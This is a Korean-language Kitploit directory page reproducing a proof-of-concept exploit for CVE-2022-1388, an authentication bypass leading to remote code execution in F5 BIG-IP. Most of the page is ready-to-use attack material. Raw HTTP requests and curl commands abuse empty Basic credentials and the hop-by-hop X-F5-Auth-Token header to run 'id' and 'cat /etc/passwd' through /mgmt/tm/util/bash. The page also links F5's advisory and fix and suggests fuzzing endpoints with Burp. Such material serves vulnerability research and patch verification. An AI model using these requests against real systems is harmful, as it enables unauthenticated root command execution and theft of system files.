Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-1388_PoC — F5 BIG-IP RCE 익스플로잇 (CVE-2022-1388) | Kitploit
도구/GitHubGitHub/alt3kx/cve-2022-1388_poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationAPI Security
GitHubalt3kx/cve-2022-1388_poc

CVE-2022-1388_PoC

F5 BIG-IP RCE 익스플로잇 (CVE-2022-1388)

저장소 보기
871714년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

F5 BIG-IP RCE 익스플로잇 (CVE-2022-1388)

POST (1): poc_id

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c 'id' " }

curl 명령줄:

root@kitploit:~
$ curl -i -s -k -X $'POST' \
-H $'Host: <redacted>:8443' \
-H $'Authorization: Basic YWRtaW46' \
-H $'Connection: keep-alive, X-F5-Auth-Token' \
-H $'X-F5-Auth-Token: 0' \
-H $'Content-Length: 52' \
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' \
$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

POST (2): poc_pass

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: <redateced>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }

curl 명령줄:

root@kitploit:~
$ curl -i -s -k -X $'POST' \
-H $'Host: <redacted>:8443' \
-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' \
-H $'X-F5-Auth-Token: 0' \
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a' \
$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

참고:

root@kitploit:~
Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>" 
+ value of headers ,see "HTTP hop_by_hop request headers"...

내 BIG-IP는 이제 수정됨:

이미지

참조 및 수정 사항:

  • https://support.f5.com/csp/article/K23605346
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

다음은 사용된 최신 문서입니다:

  • https://clouddocs.f5.com/api/icontrol-rest/

HTTP hop_by_hop 요청 헤더:

  • https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open

horizon3의 F5 iControl REST 엔드포인트 인증 우회 기술 심층 분석

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

내 메모:

  • 내 연구에 사용된 icontrol 엔드포인트 및 명령 목록으로 업데이트됨(공개 문서에서 추출)
  • 예를 들어, Burp를 "cluster bomb" 또는 "Battering ram"(단순 목록)과 함께 사용할 수 있음

Payload1: icontrol_api_endpoints.txt
Payload2: icontrol_api_commands.txt

작성자

Alex Hernandez aka (@_alt3kx_)

도구 다운로드